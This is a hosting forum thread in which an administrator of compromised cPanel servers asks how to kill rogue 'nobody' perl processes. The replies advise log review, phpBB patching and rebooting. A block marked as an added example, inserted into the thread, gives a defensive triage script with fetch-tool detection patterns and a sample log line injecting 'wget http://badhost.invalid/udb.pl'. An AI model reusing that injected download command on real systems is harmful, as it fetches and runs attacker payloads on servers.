  1. #1
    cPanel Partner NOC
    Join Date
    Feb 2005
    Posts
    8

    How can I kill all 'nobody' processes?

    I have a lot of problems. I have 10 servers; I use Trustix, Red Hat 9, Red Hat Enterprise, CentOS, Fedora and FreeBSD. I think no OS can protect tmp. I found bot.txt, worm.txt, a phpBB worm and udb.pl.

    I always find perl processes in tmp. I want to know how I can protect it, and what command kills all processes of nobody.

    I have a suggestion from ev1, but I don't know how to do it. I asked cPanel, but cPanel suggested that I must find the customer who runs it.

    I tried to search in this forum. I found this command for finding the customer who has the problem:

    grep "wget" /usr/local/apache/domlogs/*

    ev1 suggested this to me for the udb.pl problem:

    -------------------------------------------------------
    Our investigation found that your server was only exploited. No rootkits were installed, nor was root access achieved. None of your local user accounts had started the attack script either.

    Simply put, the hacker exploited the system, most likely via an apache/website script, achieved a terminal shell connection similar to ssh and telnet, then proceeded to launch an outbound attack.

    Some of the best ways to secure the server are: Have apache run under its own user name (apache or httpd). Have the 'user' account for apache be unable to execute files located in the /tmp and /var/tmp directories. The user account 'nobody' should also have these execution rights removed. Nor should apache have access to execute any other applications beyond php/cgi/perl/etc. to prevent future exploitation.

    Then you want to comb through the httpd and other logs under /var/log/ and see if you can identify the means by which the hacker exploited the system to gain access. (I.e. did they use a buffer overflow exploit on apache? Or did they take advantage of some security hole in a website's perl/cgi/php/etc. script? Was the ftp service exploited?) Once the security hole that they came in through has been identified, you can set out to secure the server so that it's not exploited once more via that hole.
    -------------------------------------------------------

    Can anyone tell me how I can do this?

    Thank you so much
    Best Regards
    eLife

  2. #2
    cPanel Partner NOC AndyReed
    Join Date
    May 2004
    Location
    Minneapolis, MN
    Posts
    2,223


    I suggest you protect and secure your servers. Running a couple of commands to kill some processes won't solve the issue. If you don't wish to hire a sysadmin to secure your server(s), you need to search these forums. The security issue you're dealing with has been discussed many times.
    Andy Reed
    RHCE and CCNA
    ServerTune.com

  3. #3
    Member rpmws
    Join Date
    Aug 2001
    Location
    back woods of NC, USA
    Posts
    1,858


    Quote Originally Posted by eLifeCP
    I have a lot of problems. I have 10 servers; I use Trustix, Red Hat 9, Red Hat Enterprise, CentOS, Fedora and FreeBSD. I think no OS can protect tmp. I found bot.txt, worm.txt, a phpBB worm and udb.pl.

    I always find perl processes in tmp. I want to know how I can protect it, and what command kills all processes of nobody.
    Searching logs for wget will get you started on what site was used. Find all the old phpBB installs and fix that. mod_security helps some. But if you have no clue what this all means, get an admin that does.
    Just keeping my "eye" on things....
    R. Paul Mathews
    RPMWS - diehard cPanel Nutcase

  4. #4
    Member
    Join Date
    Oct 2003
    Posts
    173


    www.cplicensing.net.
    Download their check phpBB version script to look for bad phpBBs. Also check for WordPress versions less than 1.5.2.

    Pay chirpy to secure your servers!
    www.configservers.com
    He does a great job!

  5. #5
    cPanel Partner NOC
    Join Date
    Feb 2005
    Posts
    8


    Thank you so much. I found the old phpBB version, but when I look for the nobody perl process I have a lot of processes. I need a killall-style command for the nobody processes, to kill them and fix it later. Can anyone help me with the command?

    Thank you so much
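    As an added example (not code from the thread, from ev1 or from cPanel), a small POSIX shell helper for the question asked in posts #1 and #5: list the processes owned by nobody, flag only those whose command line or cwd points into /tmp, /var/tmp or /dev/shm, kill just those, and run the domlog grep from post #1 widened to the other fetch tools. It assumes a Linux /proc layout and the /usr/local/apache/domlogs path from the thread; the sample ps and log lines are constructed.

```shell
#!/bin/sh
# Added example, not from the thread or from cPanel. Triage the processes owned by
# 'nobody' before killing them: a blanket `pkill -u nobody` also takes down legitimate
# Apache children, which is why the replies say to find the exploited site, not just kill.

# Read `ps -u nobody -o pid=,comm=,args=` output on stdin and print the PIDs whose
# command or arguments point into a world-writable scratch directory.
suspicious_pids() {
    awk '/\/tmp\/|\/var\/tmp\/|\/dev\/shm\// { print $1 }'
}

# Live listing of every nobody process with its cwd and binary from /proc (Linux),
# for review or for piping into suspicious_pids before anything is killed.
list_nobody() {
    ps -u nobody -o pid=,comm=,args= 2>/dev/null | while read -r pid comm args; do
        printf '%s %s %s cwd=%s exe=%s\n' "$pid" "$comm" "$args" \
            "$(readlink "/proc/$pid/cwd" 2>/dev/null)" "$(readlink "/proc/$pid/exe" 2>/dev/null)"
    done
}

# The thread's `grep "wget" /usr/local/apache/domlogs/*`, widened to other fetch tools;
# reads stdin when no file is given so it can be tried on captured lines.
fetch_hits() {
    grep -E -i 'wget|curl|lwp-download' "$@"
}

# Kill only the flagged PIDs: TERM first, a short grace period, then KILL the stragglers.
kill_flagged() {
    [ $# -gt 0 ] || return 0
    kill -TERM "$@" 2>/dev/null || true
    sleep 3
    kill -KILL "$@" 2>/dev/null || true
}

# Constructed sample input (not real data from the thread) for an offline dry run.
SAMPLE_PS='1234 perl perl /tmp/udb.pl
1235 httpd /usr/local/apache/bin/httpd -k start
1236 perl perl /var/tmp/.x/bot.txt
1237 sh sh -c sleep 60'
SAMPLE_LOG='10.0.0.1 - - [10/Sep/2005:03:14:07 +0000] "GET /forum/viewtopic.php?t=1&highlight=wget%20http://badhost.invalid/udb.pl HTTP/1.1" 200 1234
10.0.0.2 - - [10/Sep/2005:03:14:08 +0000] "GET /index.php HTTP/1.1" 200 5678'

# Dry run on the samples; on a live box use list_nobody and the real domlogs instead:
#   printf '%s\n' "$SAMPLE_PS" | suspicious_pids             # -> 1234 and 1236, one per line
#   printf '%s\n' "$SAMPLE_LOG" | fetch_hits | cut -d' ' -f1  # -> 10.0.0.1
#   kill_flagged $(list_nobody | suspicious_pids)
#   fetch_hits /usr/local/apache/domlogs/*
```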

  6. #6
    Member
    Join Date
    Mar 2004
    Posts
    710


    For someone who is NOT a server admin, you can kill all the processes (but it probably will not do much good as they might just start all over again with the exploit) by simply rebooting.

    No hard commands, no searching and killing processes, just reboot.

    (BTW, the command for that from ssh is "reboot", without the quotes. It may take 15 minutes before all services are restarted, so be aware of that.)
    Lloyd F Tennison
